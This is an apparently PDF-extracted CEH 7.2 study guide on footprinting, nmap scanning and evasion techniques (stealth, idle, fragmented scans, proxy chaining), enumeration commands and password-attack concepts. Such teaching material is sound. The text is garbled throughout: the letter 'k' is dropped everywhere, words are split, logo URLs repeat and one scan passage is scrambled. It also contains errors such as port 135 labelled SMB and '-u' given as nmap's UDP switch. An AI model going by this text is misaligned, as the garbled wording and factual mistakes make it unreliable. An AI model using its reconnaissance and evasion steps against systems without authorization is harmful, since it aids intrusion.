CEH 7.2 Supplemental Study Guide for Footprinting and Scanning Networks

C|EH 7.
2 Dave Chronister, C|EH, CISSP, MCSE, C|HFI Jason Roberts, C|EH, Security+, C|HFI Ben Miller, C|EH, Security+ Hac er-University C|EH 7.2 Supplemental Study Guide
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 2 Footprinting Study Guide Objectives: . . . . . . . . . . . . . . . What is Footprinting? Objectives of Footprinting Footprinting Threats Footprinting Methodology Internet Footprinting Competitive Intelligence WHOIS Footprinting People Searching DNS Footprinting Networ Footprinting Email Footprinting Google Hac ing Additional Footprinting Tools Footprinting Countermeasures Footprinting Pen Testing
What is Footprinting Footprinting is the term used for collecting information about a target. This is the first step of fully identifying a target in order to begin planning an attac . Footprinting refers t o finding the digital and material footprint of information made by a targets existence. The objective of Footprinting is to find as much information as possible about a target from as many sources as you can secure. In malicious hac ing and blac box ethical hac ing, i t is important to eep this information gathering secret as well. Relevant target information includes: Domain Name User and Group Names Networ Bloc s System Names IP Addresses Employee Details Networ ing Protocols Company Directory VPN points News Articles/Press releases Intrusion Detection system running System Banners
Footprinting Threats The threat of Footprinting is that a hac er will find out sensitive information about a target from a publicly accessible source. From the targets perspective it is important to now what information is available to the general public Footprinting Methodology
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Footprinting begins with finding the targets main URL. Any search engine will us ually disclose this website. From this main website you can begin searching for other internal URL s s uch as intranet.*.com or mail.*.com
Internet Footprinting Our practice uses robtex.com and archive.org for finding information that has be en, or is currently loaded on websites. Archive.org s Waybac Machine eeps a database of when websites have changed their content organized by date so that you can view the website as it h as progressed over the years. Robtex.com lists connections between websites that share a domain. Competitive Intelligence For business intelligence, any financial website will have information on public ally traded companies. Job hunting websites such as monster.com and dice.com allow for searching by com pany, which can be used to find out what technical s ills they are currently loo ing for. This allo ws for an intelligent hac er to have an idea where a company may be wea , or if they are loo ing to expand in to a new technology. WHOIS Footprinting The regional internet registries such as ARIN for North America eep a database of information about domain names and who owns them. This information can be used to find a target bl oc of external IP
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg addresses and may provide information about technical points of contact, includi ng the occasional phone number and email address.
People Searching After a hac er has information about a company in general they may require more specific information about people employed or associated with the target. Using emails listed on inte rnet sources, a hac er may begin profiling social media websites such as Faceboo and Lin edIn loo ing for more information. More specific information can be found on people searching websites, government websites for court cases, and Google Earth can be used to find location data. DNS Footprinting Using online tools such as www.chec dns.net , the publically available DNS recor ds for a site or IP address can be located. Some systems have more information than others. This inf ormation may give a hac er a better understanding of a naming scheme and the organization of a targe t s computer system. Networ Footprinting
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Footprinting the edge networ of a target begins with finding the IP range from WHOIS and then using a tool such as traceroute to determine the position of routers and possible DMZ s. T raceroute measures hops in the route from one address to another by manipulating the Time to Live o f ICMP pac ets. It is at this point that Footprinting becomes Active. Reading information is a passive me thod. Sending probes such as traceroutes to a target and getting a response bac is an active method. Anytime you connect with the target it is Active footprinting. If you call the a utomated attendant in the middle of the night to wor out the phone tree, this is active.
Email Footprinting Email trac ing can be used to monitor emails sent, when they are read and from w hat IP address. Email sending programs can generate random email possibilities such as Jsmith@hac erta rget.com to find out what names are actually in use. Using these techniques it is possible to map out an organization s email structure. This can also be used to learn if there are any rules bloc ing execut ables, PDF documents, and size restrictions. Remember, any phishing emails sent to the mail server address ing schema is active footprinting. Google Hac ing Google hac ing refers to using the power of the advanced operator options in sea rch engines to find exploitable targets and footprint nown targets in a simple fashion. For example using the intitle operator you can search for websites that have in their title the word password wh ich could give you valuable information about password policies or even a document listing password s.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg The hac ersforcharity.org website Google Hac ing Database has a list of common s earches used by hac ers, although this information is becoming outdated. Google Advanced Operators . . . . [site:] [allintitle:] [intitle] [inurl:]
Additional Footprinting Tools In addition to other tools previously mentioned, Maltego is another great footpr inting tool. It provides a graphical representation of data. The use of this tool ma es it easier to visu alize connections found in Footprinting a target and ways of finding relationships that may not have been a pparent at first glance. However, it is important to now that Maltego maintains a cache of data that is not always the most up to date.
Footprinting Countermeasures The most important countermeasure to Footprinting is: nowing what information i s available to outside requests. The information that is available may not be sensitive or wort h eeping secret, but if an entity does not now what is available they cannot ma e that determination.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Proper configuration of networ devices can protect from most technical Footprin ting. WHOIS information registered should point to a position in the company not a specific person. Policies should be enacted for the release of information through any channel, w eb, email, phone communications, and any other method. Once the information is released it will b e cataloged and ept in some form somewhere.
Be familiar with: 20 FTP data 110 POP3 21 FTP control 135 SMB 22 SSH 137 Netbios 23 Telnet 138 Netbios 25 SMTP 139 Netbios 53 DNS TCP and UDP! 161 SNMP 69 TFTP 389 LDAP 80 HTTP 443 HTTPS 88 Kerberos 636 LDAP over SSL or TLS
Note: The CEH exam expects you to have
nowledge of standard ports.
Footprinting Pen Testing First and foremost, get proper written authorization before beginning any Footpr inting. For the most part, passive information gathering is legal. However, legal does not always eth ical as well. After you have written authorization find out as much as you can about your target using p assive techniques,
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg documenting everything you find along the way. Once you have exhausted passive s ources, use active sources as anonymously as possible to eep yourself from being noticed. Document ation at this stage will ma e every other hac ing activity easier.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 3 S canning Networ s Study Guide Objectives: . . . . . . . . . . . Definition and Types of Scanning Understanding CEH Scanning Methodology Chec ing Live Systems and Open ports Understanding Scanning Techniques Different Tools Present to Perform Scanning Understanding Banner Grabbing and OS Fingerprinting Drawing Networ Diagrams and Vulnerable Hosts Preparing Proxies Understanding Anonymizers Scanning Countermeasures Scanning Pen Testing
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Definitions and Types of Scanning Networ scanning is a procedure for identifying active hosts on a networ , eith er for the purpose of attac ing them or for networ security assessment. Scanning procedures, such as ping sweeps and port scans, return information about which IP addresses map to live hosts that are ac tive on the Internet and what services they offer. Port Scan - An attac that sends client requests to a range of server port addre sses on a host, with the goal of finding an active port and exploiting a nown vulnerability of that serv ice. Vulnerability Scan- Designed to assess computers, computer systems, networ s or applications for wea nesses.
Understanding CEH Scanning Methodology
1. 2. 3. 4. 5. 6.
Chec for Live Systems Chec for Open Ports Banner Grabbing Scan for Vulnerability Draw Networ Diagrams Prepare Proxies
Networ Scan- Identifies active hosts on a networ
Chec ing Live Systems and Open ports ICMP Scanning- During most ping scans using ICMP, an ICMP_ECHO datagram is sent to the remote computer to determine whether it has an active IP or not. If all is w ell the computer that sent the ICMP_ECHO pac et will receive an ICMP_ECHO_REPLY pac et w hich means that the host computer is up and alive. If no response is received, it usu ally means that the host computer is down or an administrator is filtering the reply from t he host. The simplest of tools to do this is to use the ping command which comes with most *n ix systems and Windows systems ali e. Ping Sweeps - are used to determine live hosts from a range of IP addresses by s ending ICMP ECHO requests to multiple hosts, if they are alive they will respond with a n ICMP ECHO reply. It can be used to create an inventory of live systems on a networ . TCP Three Way Handsha e- To establish a connection, TCP uses a three-way handsha e. Before a client attempts to connect with a server, the server must first bind to a port t o open it up for connections: this is called a passive open. Once the passive open is established , a client may initiate an active open. To establish a connection, the three-way (or 3-step) handsha e occu rs: 1. SYN: The active open is performed by the client sending a SYN to the server. It sets the segment's sequence number to a random value A. 2. SYN-ACK: In response, the server replies with a SYN-ACK. The ac nowledgment n umber is set to one more than the received sequence number (A + 1), and the sequence number that the server chooses for the pac et is another random number, B. 3. ACK: Finally, the client sends an ACK bac to the server. The sequence number is set to the received ac nowledgement value i.e. A + 1, and the ac nowledgement number is set to one more than the received sequence number i.e. B + 1.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg At this point, both the client and server have received an ac nowledgment of the connection If that didn t sin in, here s another way of thin ing about it The Three Way Handsha e is a lot li e a phone call You dial the number, (the initial connection, (SYN)), the recipient pic s up the phone, ( hello , (SYN/ACK)), and you respond Hi there, this is Bill , (ACK).
From there you two tal , (lots of ACK s). At the end of the conversation one of you says
well, I gotta go , (FIN),
and the other person says, o , see you, bye, (FIN/ACK), you say Bye , (ACK), and the conversation closes by you both putting the phone down. In between there are a bunch of ACK/PSH and ACK s as you two chat. Each part of th e conversation is bro en down into sentences if you will. As the two of you transfer data those sent ences are passed bac and forth with those ACK/PSH and ACK flags set
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Hping2 / Hping3 Hping is a free pac et generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networ s, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new versio n of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP pac ets, so that the programmer can write scripts related to low level TCP/IP pac et manipulation and analysis in a very short time. Li e most tools used in computer security, hping is useful to security experts, but there are a lot of applications related to networ testing and system administration. Understanding Scanning Techniques (-s*) = Switches used in Nmap This is Zenmap which is the front-end GUI for nmap, very helpful to learn switch es
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg TCP Connect/ Full Open Scan (-sT) The TCP connect scan is named after the connect call that's used by the operati ng system to initiate a TCP connection to a remote device. Unli e the TCP SYN scan (-sS), the TCP connec t scan uses a normal TCP connection to determine if a port is available. This scan method uses the sa me TCP handsha e connection that every other TCP-based application uses on the networ . This scan is very noisy on a networ and highly detectable through application e vent logs. It might be considered the TCP scan of last resort. If privileged access isn't available and determination of open TCP ports is absolutely necessary, however, this scan may be the only method availab le. Stealth Scan (Half-Open Scan) (-sS) The TCP SYN scan uses common methods of port-identification that allow nmap to gather information about open ports without completing the TCP handsha e process. When an open port is identified, the TCP handsha e is reset before it can be completed. This techniqu e is often referred to as "half open" scanning. The SYN scan is a common scan when loo ing for open ports on a remote device, an d its simple SYN methodology wor s on all operating systems. Because it only half-opens the TCP c onnections, it's considered a very clean scan type. The TCP SYN scan never actually creates a TCP session so it isn't logged by the destination host's applications. This is a much "quieter" scan than the TCP connect scan, and there 's less visibility in the destination system's application logs since no sessions are ever initiated.
The SYN Scan requires privileged access to the system. Without privileged access nmap cannot create the raw pac ets necessary for this half-open scan The SYN scan only provides open, closed, or filtered port information. To determ ine operating system or process version information, more intrusive scanning is required, such as the ve rsion scan (-sV) or the operating system fingerprinting (-O) option. Xmas Scan (-sX), FIN Scan (-sF), and NULL Scan (-sN) These three scans are grouped together because their individual functionality i s very similar. These are called "stealth" scans because they send a single frame to a TCP port withou t any TCP handsha ing or additional pac et transfers. This is a scan type that sends a single frame wi th the expectation of a single response. The differences between them are how the TCP flags are set: Xmas FIN FIN/URG/PUSH flags FIN flag
Null-No Flags set) The XMAS Scan (-sX) sends a TCP frame to a remote device with the FIN, URG, PUSH flags set. This is called a Xmas tree scan because of the alternating bits turned on and off in the flags byte (00101001), much li e the lights of a Christmas tree.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg The FIN Scan (-sF) The TCP FIN scan identifies listening TCP port on how the target device reacts to a transaction close request for a TCP port (even ection may exist before these close requests are made). This type of scan can get through s and boundary routers that filter on incoming TCP pac ets with the Finish (FIN) and ACK on. The TCP pac ets used in this scan include only the TCP FIN flag setting. numbers based though no conn basic firewall flag combinati
The Null Scan (-sN) is a type of TCP scan that hac ers both ethical and maliciou s use to identify listening TCP ports. In the right hands, a Null Scan can help identify potential holes for server hardening, but in the wrong hands, it is a reconnaissance tool. It is a pre-attac probe. A Null Scan is a series of TCP pac ets that contain a sequence number of 0 and n o set flags. In a production environment, there will never be a TCP pac et that doesn t contain a fl ag. Because the Null Scan does not contain any set flags, it can sometimes penetrate firewalls and ed ge routers that filter incoming pac ets with particular flags. The expected result of a Null Scan on an open port is no response. Since there a re no flags set, the target will not now how to handle the request. It will discard the pac et and no reply will be sent. If the port is closed, the target will send an RST pac et in response The IDLE Scan The IDLE scan (-sI) is the ultimate stealth scan but can me more time consuming . You also need to locate a zombie wor station/networ device that is IDLE, hence the name. If the zombie is not idle and has other networ traffic, it will bump up its IP ID sequence and disrupt the sc an logic.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg The lower the latency between the attac er and the zombie, and between the zombi e and the target, the faster the scan will proceed. Simple networ devices such as printers often ma e great zombies because they ar e commonly both underused (idle) and built with simple networ stac s which are vulnerable to IP ID traffic detection. Open Port: Using a spoofed zombie IP address you will send a SYN pac et to the t arget, if the target s port is open, it will send a SYN/ACK to the zombie. The zombie will respond to t he SYN/ACK with a RST pac et bumping up its IP ID by 1. Closed Port: If the port is closed, your SYN pac et spoofing the zombie s IP addre ss will cause the target machine to respond with a RST pac et. The zombie will not respond to the RST pac et, and the IP ID will not be incremented. ICMP Echo Scanning/List Scan The ICMP Echo scan (-sP) is the most simplistic discovery method and the easies t to detect. By sending a series of ICMP echo request (ICMP type 8) pac ets to various IP addres ses, a hac er can determine which systems are active (or "alive"). Knowing that Intrusion Detectio n Systems (IDSs) are designed to catch this type of discovery sequence, hac ers vary the destination devices or delay the ping interval by minutes, hours, or even days.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg -sL (List Scan) The list scan is a degenerate form of host discovery that simply lists each host of the networ (s) specified, without sending any pac ets to the target hosts. By default, Nmap sti ll does reverseDNS resolution on the hosts to learn their names. It is often surprising how muc h useful information simple hostnames give out. For example, fw.chi is the name of one co mpany's Chicago firewall. Nmap also reports the total number of IP addresses at the end. The list scan is a good sanity chec to ensure that you have proper IP addresses for your targets . If the hosts sport domain names you do not recognize, it is worth investigating further to pr event scanning the wrong company's networ SYN/Fin Scanning Using IP Fragments (-f) Fragmentation scanning : This is not a new scanning method in and of itself, but a modification of other techniques. Instead of just sending the probe pac et, you brea it into a couple of small IP fragments. You are splitting up the TCP header over several pac ets to ma e it harder for pac et filters and so forth to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny pac ets.
The f instructs the specified SYN or FIN scan to use tiny fragmented pac ets.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg UDP Scanning
This scanning method varies from the above in that we are using the UDP protoco l instead of TCP. While this protocol is simpler, scanning it is actually significantly more diffi cult. This is because open ports don't have to send an ac nowledgement in response to our probe, and closed ports aren't even required to send an error pac et. Fortunately, most hosts do send an ICMP_PORT_U NREACH error when you send a pac et to a closed UDP port. Thus you can find out if a port is NOT o pen, and by exclusion determine which ports which are. Neither UDP pac ets, nor the ICMP errors are gu aranteed to arrive, so UDP scanners of this sort must also implement retransmission of pac ets that app ear to be lost (or you will get a bunch of false positives).
Also, you will need to be root for access to the raw ICMP soc et necessary for r eading the port unreachable. The -u (UDP) option of nmap implements this scanning method for roo t users.
Some thin UDP scanning is pointless, however you may come across holes where se rvices are running on undocumented higher UDP ports. While some lower ports maybe bloc ed you may b e successful with scanning higher ports.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
Inverse TCP Flag Scanning Filtering and other security systems such as firewalls and IDS can detect SYN pa c ets and there are programs available that can detect half-open SYN Flag scan attempts as well. Probe pac ets with strange TCP Flags set can sometimes pass through undetected, depending on the security mechanisms in place. Using malformed TCP flags to probe a target is nown as an inverted technique be cause responses are sent bac only by closed ports. RFC 793 states that if a port is closed on a hos t, an RST/ACK pac et should be sent to reset the connection. To ta e advantage of this feature, attac ers send TCP probe pac ets with various TCP flags set. A TCP probe pac et is sent to each port of the target host. Three types of probe pac et flag configurations are normally used: . A FIN probe with the FIN TCP flag set . An XMAS probe with the FIN, URG, and PUSH TCP flags set . A NULL probe with no TCP flags set RFC standard 793 states that if no response is seen from the target port, eithe r the port is open or the server is down. This scanning method isn t necessarily the most accurate, but it is stealthy; it sends garbage that usually won t be pic ed up to each port.
For all closed ports on the target host, RST/ACK pac ets are received. However, some operating platforms (such as those in the Microsoft Windows family) disregard the RFC 793 standard, so no RST/ACK response is seen when an attempt is made to connect to a closed port. He nce, this technique is effective against some Unix-based platforms. ACK Flag Scanning (-sA) A stealthy technique is that of identifying open TCP ports by sending ACK probe pac ets and analyzing the header information of the RST pac ets received from the target host. This te chnique exploits vulnerabilities within the BSD-derived TCP/IP stac and is therefore only effect ive against certain operating systems and platforms. There are two main ACK scanning techniques: . Analysis of the time-to-live (TTL) field of received pac ets . Analysis of the WINDOW field of received pac ets These techniques can also chec filtering systems and complicated networ s to un derstand the processes pac ets go through on the target networ . For example, the TTL value c an be used as a mar er of how many systems the pac et has hopped through
Different Tools Present to Perform Scanning IP Fragmentation tools: Fragtest, Fragroute for fragmenting probe pac ets. Nmap: Free, open source utility for networ exploration /mapping. Nmap will extract information such as:
Services (application names and versions) Operating Systems (OS Versions) Type of pac et (filters/firewalls) SuperScan: is a powerful TCP port scanner, that includes a variety of additional networ ing tools li e ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchro nous techniques resulting in extremely fast and versatile scanning. Understanding Banner Grabbing and OS Fingerprintng OS Fingerprinting determines what operating system is running on a remote target system. There are two types of OS Fingerprinting: Active and Passive. Active OS Fingerprinting uses specially crafted pac ets sent to the remote OS an d the response is compared with a database to determine the OS. Reponses from different Operating Systems vary due to differences in TCP/IP stac implementation.
Live hosts on a networ
Passive OS Fingerprinting uses sniffing techniques to capture pac ets flowing fr om the system. Captured pac ets are then analyzed for OS information. It is also based on varia tions of how the TCP/IP Stac is implemented. Banner Grabbing Banner Grabbing is an enumeration technique used to glean information about com puter systems on a networ and the services running its open ports. Administrators can use this to ta e inventory of the systems and services on their networ . An intruder however can use banner grabbi ng in order to find networ hosts that are running versions of applications and operating systems wi th nown exploits. A telnet client can be used for banner grabbing: telnet [target ip or URL] [port ] telnet www.victim.com 80 then you may use GET or HEAD COMMANDS in your telnet session, the HEAD command w ill suffice for fingerprinting ex. HEAD /HTTP /1.0
Banner grabbing from error pages Typing in a URL that does not exist on a server can result in an error page lis ting server information.
Drawing Networ Diagrams and Vulnerable Hosts Vulnerability scanning- Identifies vulnerabilities and wea nesses of a system an d networ in order to determine how a system can be exploited Scanning tools: Saint, Nessus and Core Impact Networ Diagrams- The physical networ topology can be directly represented in a networ diagram, as it is simply the diagrams with networ nodes and connections as undirected or di rect edges (depending on the type of connection). The logical networ topology can be inferred from th e networ diagram if details of the networ protocols in use are also given. Preparing Proxies Proxy Server - a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients see ing resources from other servers. A c lient connects to the proxy server requesting some service such as a file, connection, web page, or ot her resource available from a different server. The proxy server then evaluates the request according t o its filtering rules. There are thousands of free public proxy servers that are easily found on google . Attac ers use them for scanning and attac ing anonymously Soc schain is a program that allows a user to wor with any Internet service thr ough a chain of SOCKS or HTTP proxies to hide the real IP-address.
TOR (The Onion Routing) Proxy Chaining software Tor is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer networ of servers in order to conceal a user's location o r usage from someone conducting networ surveillance or traffic analysis. Using Tor ma es tracing Int ernet activity, including "visits to Web sites, online posts, instant messages and other communication for ms", to the user more difficult.[7] It is intended to protect users' personal freedom, privacy, and ab ility to conduct confidential business, by eeping their internet activities from being monitored.[8] The soft ware is open-source and the networ is free of charge to use HTTP Tunneling HTTP Tunneling is a technique by which communications performed using various networ protocols are encapsulated using the HTTP protocol, the networ protocol s in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the networ protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting them to be used in conditions of restricted net wor connectivity including firewalled networ s and networ s behind proxy servers. SSH tunneling A Secure Shell (SSH) tunnel consists of an encrypted tunnel created through a SS H protocol connection. Users may set up SSH tunnels to transfer unencrypted traffi c over a networ through an encrypted channel.
To set up an SSH tunnel, one configures an SSH client to forward a specified loc al port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect t o the specified local port to access the networ service. The local port need not have the same port n umber as the remote port. SSH tunnels provide a means to bypass firewalls that prohibit certain Internet s ervices so long as a site allows outgoing connections. For example, an organization may prohibit a us er from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which provides the organization with a means of monitoring and controlling what the us er sees through the web). But users may not wish to have their web traffic monitored or bloc ed by t he organization's proxy filter. If users can connect to an external SSH server, they can create an SSH t unnel to forward a given port on their local machine to port 80 on a remote web-server. To access the rem ote web-server users would point their browser to the local port at http://localhost/. SSL Proxy You probably now secure HTTP from secure websites. Say, you want to operate a s ecure web server but have only a normal server. SSL Proxy can be your solution: It's plugged into the connection between the client and the server and adds Secure Soc et Layer (SSL) support. Or the oth er way around: You have an ordinary telnet client but want to connect to a secure site. Just start SSL P roxy with the appropriate parameters and you re good to go. That's what SSL Proxy can do for you Understanding Anonymizers Anonymizer An anonymizer or an anonymous proxy is a tool that attempts to ma e activity on the Internet untraceable. It is a proxy server computer that acts as an intermed iary and privacy shield between a client computer and the rest of the Internet. It accesses the Internet on the user's behalf, protecting personal information by hiding the client computer's identifying info rmation.
IP Address Spoofing IP address spoofing or IP spoofing refers to the creation of Internet Protocol ( IP) pac ets with a forged source IP address, called spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system. Scanning Countermeasures Ethical hac ers use their tool set to test the scanning countermeasures that hav e been implemented. Once a firewall is in place, a port-scanning tool should be run against hosts on the networ to determine whether the firewall correctly detects and stops the port scanning activity. The firewall should be able to detect the probes sent by port-scanning tools. The firewall should carry out stateful inspections, which means it examines the data of the p ac et and not just the TCP header to determine whether the traffic is allowed to pass through the firewall. Networ IDS should be used to identify the OS-detection method use d by some common hac ers tools, such as Nmap. Only needed ports should be ept open. The rest should be filtered or bloc ed. The staff of the organization using the systems should be given appropriate trai ning on security awareness.
War Dialing Countermeasure War Dialing is the technique of using a special program with a modem to automati cally scan a list of telephone numbers, usually dialing every number in a local area code to searc h for computers. When hac ers target companies, one of the first things they do is war dial the c entral office near the company. Companies rarely control the dial-in ports as strictly as the firewall, and machines with attached modems are sprin led throughout the company on people's des top compute rs and specialpurpose computers that communicate with partners. War Dialing Tools: WarVOX, PhoneSweep, and ToneLoc Tool to detect War Dialing: Sandtrap
Scanning Pen Testing 1. 2. 3. .) 4. 5. 6. 7. Perform Host discovery (Nmap, Angry IP Scanner, etc.) Perform Port scanning (Nmap,Netscan, UDP Scanner,etc.) Perform Banner Grabbing/OS Fingerprinting (Telnet, Netcraft, Error Pages, etc Scan for vulnerabilities (SAINT, Core Impact,Nessus) Draw Networ Diagrams (LAN Surveyor, Ipsonar) Prepare Proxies (Proxifier, Soc sChain, SSL Proxy) Document all findings
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 4 Enumeration Study Guide Objectives: . . . . . . . . . . Enumeration Defined Techniques for Enumeration NetBIOS Enumeration User Account Enumeration SNMP Enumeration Unix/Linux Enumeration LDAP / Active Directory NTP Enumeration SMTP and DNS Enumeration Enumeration Countermeasures
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Enumeration Defined Enumeration is the process of extracting user names, machine names, networ reso urces, and lists of services from a target environment. This step in the methodology is often carrie d out along with scanning. As your information comes in from your various tests and sources it is imperative to Document Everything. Enumeration often comes into play when a hac er has wor ed themselves into a place on the networ , such as on an intranet Techniques for Enumeration The techniques listed below are used to gather Username information or networ d evice information. In order to create a clearer picture of a target, multiple methods are commonly used together. NetBIOS Enumeration NetBIOS refers to an older method of communication over a networ to control ses sions. This is still commonly used over TCP/IP. The name service eeps a list of computers that belon g to a domain. If services that are used contain NetBIOS names, this may allow a hac er to create a list of computers in the networ . For example running the psexec tool can be used to list an ipconfig output from all the computers on the domain. User Account Enumeration Creating a list of user accounts is often necessary for a hac er. User accounts can be found on a local machine or in a domain structure.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SNMP Enumeration The Simple Networ Management Protocol is intended to be used to remotely monito r devices on a networ using TCP/IP. Using this protocol an attac er can extract information, e specially if the default public and private names are still in use. Most networ monitoring software can be u sed in this manner. Unix/Linux Enumeration
LDAP Enumeration Lightweight Directory Access Protocol is a method used to access listing in an A ctive Directory type environment. Using a tool such as JXplorer a hac er can attach to a directory an d read the contents in a very manageable form. NTP Enumeration Using the Networ Time Protocol on UDP 123, computers on a networ can be ept i n sync with the NTP server. This also allows for tools to scan and determine if this port is open on target systems.
These systems have some standard commands for finding information on the networ . The showmount command finds shared directories. The finger command can be used to list user, h ost, and other information on a system. Rpcclient and rpcinfo can be used to determine username s and applications communicating over the networ
SMTP Enumeration The Simple Mail Transfer Protocol was not built with security in mind. Accessing a server with SMTP port 25 open can be a very simple process. The SMTP server provides feedbac abo ut email addresses as they are given to the service, this can be used to verify newly found email a ddresses DNS Enumeration The Domain Name service provides a translation for IP addresses that devices use on a networ into words that are better understood and remembered by humans. If configured incorre ctly it is possible for an attac er to use this service to enumerate all the systems on a networ . F rom the command line the syntax is: host -l domain name ip address or dns name of DNS server. The nsl oo up command can also be used to enumerate hosts. Enumeration Countermeasures As always, only use services that are necessary for a system. If you do not need SNMP, NTP, SMTP, or LDAP, eep them disabled. You should always change default passwords to accounts , even on networ devices such as routers, switches, and gateways. Restrict information from being accessed by Anonymous connections. Test configurations of DNS and SMTP servers to ensure the y are configured properly and are only accessed by systems and users who have been authenticated.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 5 System Hac ing Study Guide Objectives:
. . . . . . . . . . . . . . .
Introduction to System Hac ing Password Crac ing Password Crac ing Techniques Types of Password Attac s Automatic Password Crac ing Algorithm Privilege Escalation Executing Applications Keylogger Spyware Root its Detecting Root its NTFS Data Stream What is Steganography Steganalysis Covering Trac s
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Introduction to System Hac ing Stages of hac ing and where System Hac ing comes in: 1. Footprinting -IP ranges, Namespace, Employee Web Usage 2. Scanning- Target assessment, Identification of services, Identification of Sy stems 3. Enumeration- Intrusive probing, User lists, Security flaws 4. System Hac ing- a) Gaining Access (Crac ing Passwords, Escalating Privileges)
b) Maintaining Access (Executing Applications, Hiding Files) c) Clearing logs (Covering Trac s) Password Crac ing Password crac ing is the process of recovering passwords from data that has been stored in or transmitted by a computer system. Password complexity is crucial in the defense against password crac ing Password Crac ing Techniques Dictionary Attac s A dictionary attac uses a targeted technique of successively trying all the words in an exhaustive list called a dictionary (from a pre-arranged list of values). A d ictionary attac tries only those possibilities which are most li ely to succeed, typically derived from a l ist of words for example a dictionary (hence the phrase dictionary attac ) or a bible etc. Generally, dicti onary attac s succeed because many people have a tendency to choose passwords which are short (7 chara cters or fewer).
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Brute Forcing Attac s or exhaustive ey search is a strategy that can in theory be used against any encrypted data by an attac er who is unable to ta e advantage of any wea ness in an encryption system that would otherwise ma e his/her tas easier. It involves systematically chec ing all possible eys until the correct ey is found.
Syllable Attac - It is the combination of brute force and dictionary attac s. Th is can be effective for non-existent words. Rule-based Attac - used when an attac er gains some information, usually followi ng some form of enumeration that has identified the password policy in place. This allows the at tac er to customize the crac ing tools to be used. Types of Password Attac s Passive Online Attac s Wire Sniffing- Pac et sniffing tools can be run on a LAN to access and record ra w networ traffic. Active Online Attac s Man-in-the-Middle (MITM) attac - is a form of active eavesdropping in which the attac er ma es independent connections with the victims and relays messages between them, ma in g them believe that they are tal ing directly to each other over a private connection, when in fact the entire conversation is controlled by the attac er.
Hybrid Attac - a Hybrid Attac builds on the dictionary attac numerals and symbols to dictionary words.
method by adding
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Replay Attac This is an attac where an authentication session is captured by a sniffer, then replayed by an attac er to fool a computer into granting access. Trojans/Spyware/Keyloggersa) Trojans can be used to gain access to computers and phone home to an attac er giving them remote control of the system b) Spyware is a type of malware that can be installed on computers to collect pi eces of information about users without their nowledge
